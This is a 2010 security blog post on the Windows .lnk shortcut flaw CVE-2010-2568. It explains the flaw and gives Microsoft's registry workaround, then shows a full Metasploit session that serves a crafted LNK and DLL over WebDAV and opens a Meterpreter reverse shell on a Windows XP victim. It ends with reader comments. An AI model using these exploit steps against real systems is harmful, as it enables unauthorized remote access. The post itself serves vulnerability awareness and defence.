Windows “Shortcuts to Pawnage”

On 16th July, 2010 a researchers found out a new shortcut to Pawn Remote System in an unusual way. They crafted a way to exploit windows shortcut files, commonly referred as .lnk file in order to gain unauthorized access to remote computer.

Users need not even click the shortcut file, if s/he views it in explorer; that’s it…Game Over!! Interesting right?

Let’s dig deeper to know the exact cause of this shortcut to pawnage ;)

Vulnerability:

There exists an unpatched vulnerability (CVE-2010-2568) in the Windows .lnk file (aka shortcuts)/piff file parser code. Windows automatically executes the malicious code when a specially crafted .lnk/piff file is read by windows explorer or any other similar application displaying icons for the shortcuts. This vulnerability can be exploited locally from USB drives or over a network shared or even from remote WebDAV locations.

As this vulnerability is not related to buffer overflows or memory corruptions etc.; ASLR and protected mode will not help in avoiding exploitation. All versions of Windows OS are affected from this vulnerability.

Exploitation:

According to AV vendor VirusBlokAda, this vulnerability is already being exploited in the wild and has seen fully patched Windows 7 machines getting infected by a worm exploiting this vulnerability. See references for the complete document on the Worm Analysis.

After successful exploitation of the vulnerability, worm sends “SUCKM3 FROM EXPLORER.EXE MOTH4FUCKA #@!” message to the Windows debugger.

Metasploit also just released an exploit module for this attack which uses WebDAV location as an attack vector. We will have a complete demonstration of this exploit in the pawnage section.

Workarounds/Mitigation:

Microsoft is asking end users to utilize following registry workaround to disable icons from being displayed in windows shell. When this workaround is implemented, shortcut files and Internet Explorer shortcuts will no longer have an icon displayed.

  • Open RegEdit
  • Locate HKEY_CLASSES_ROOT\lnkfile\shellex\IconHandler
  • Change the value from {00021401-0000-0000-C000-000000000046} to “”
  • Locate HKEY_CLASSES_ROOT\piffile\shellex\IconHandler
  • Change the value from {00021401-0000-0000-C000-000000000046} to “”
  • Close Regedit.
  • Restart the explorer.exe  or reboot windows.

Disabling WebClient Services will also help protect systems from attacks using WebDAV attack vectors.

Pawanage demo:

Let’s look at this demo on pawning a windows XP box using Metasploit. In this demo, metasploit is redirecting victims to malicious windows share containing specially crafter .lnk file and a malicious .dll file containing actual payload using a WebDAV requests.

As soon as this windows share from attackers box is read by victim’s shell(windows explorer in our case); specially crafted .lnk file inject payload .dll file in the address space of victim’s explorer process which drives the payload to gain shell.

Following is the steps followed by an attacker to exploit this vulnerability.

msf > use exploit/windows/browser/ms10_xxx_windows_shell_lnk_execute
msf exploit(ms10_xxx_windows_shell_lnk_execute) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(ms10_xxx_windows_shell_lnk_execute) > ifconfig
[*] exec: ifconfig

eth0      Link encap:Ethernet  HWaddr 00:0c:29:73:7b:ff
          inet addr:192.168.146.128  Bcast:192.168.146.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:fe73:7bff/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:502 errors:0 dropped:0 overruns:0 frame:0
          TX packets:36 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:50019 (50.0 KB)  TX bytes:5554 (5.5 KB)
          Interrupt:19 Base address:0x2000 

lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:16 errors:0 dropped:0 overruns:0 frame:0
          TX packets:16 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:960 (960.0 B)  TX bytes:960 (960.0 B)

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set LHOST 192.168.146.128
LHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > show options

Module options:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host to listen on.
   SRVPORT  80               yes       The daemon port to listen on (do not change)
   URIPATH  /                yes       The URI to use (do not change).

Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique: seh, thread, process
   LHOST     192.168.146.128  yes       The listen address
   LPORT     4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic

msf exploit(ms10_xxx_windows_shell_lnk_execute) > set SRVHOST 192.168.146.128
SRVHOST => 192.168.146.128
msf exploit(ms10_xxx_windows_shell_lnk_execute) > exploit
[*] Exploit running as background job.

[*] Started reverse handler on 192.168.146.128:4444
[*]
[*] Send vulnerable clients to \\192.168.146.128\ncSTz\
[*]
[*] Using URL: http://192.168.146.128:80/
[*] Server started.
msf exploit(ms10_xxx_windows_shell_lnk_execute) > [*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Responding to WebDAV OPTIONS request from 192.168.146.129:1035
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz
[*] Sending 301 for /ncSTz ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/
[*] Sending directory multistatus for /ncSTz/ ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/desktop.ini
[*] Sending 404 for /ncSTz/desktop.ini ...
[*] Sending LNK file to 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.manifest ...
[*] Sending DLL payload 192.168.146.129:1035 ...
[*] Received WebDAV PROPFIND request from 192.168.146.129:1035 /ncSTz/wwPSnSJ.dll.123.Manifest
[*] Sending 404 for /ncSTz/wwPSnSJ.dll.123.Manifest ...
[*] Sending stage (748032 bytes) to 192.168.146.129
[*] Meterpreter session 1 opened (192.168.146.128:4444 -> 192.168.146.129:1039) at Wed Jul 21 00:11:19 +0530 2010

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -l

Active sessions
===============

  Id  Type         Information                                      Connection
  --  ----         -----------                                      ----------
  1   meterpreter  VICTIM-AJG5DLK5\Administrator @ VICTIM-AJG5DLK5  192.168.146.128:4444 -> 192.168.146.129:1039

msf exploit(ms10_xxx_windows_shell_lnk_execute) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer: VICTIM-AJG5DLK5
OS      : Windows XP (Build 2600, ).
Arch    : x86
Language: en_US

GAME OVER!!!

Following is the video demonstration of above attack using Metasploit.

YouTube Preview Image

References:

Rating 3.00 out of 5

5 Responses to “Windows “Shortcuts to Pawnage””

  1. Roger Says:

    When is the video coming.

  2. Abhijeet Says:

    Just posted!!!
    Enjoy :)

  3. Ajeet Says:

    video is good. Thanks for sharing.

  4. El Pato Says:

    Not bad, but nowhere near as 31337 as this rockstar! http://www.youtube.com/watch?v=SXmv8quf_xM&feature=player_embedded

  5. Abhijeet Says:

    Very amusing :)

Leave a Reply

This entry was posted on Wednesday, July 21st, 2010 at 12:25 pm and is filed under Exploitation, HOWTO's, Information Security, Vulnerability. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.

Get Adobe Flash playerPlugin by wpburn.com wordpress themes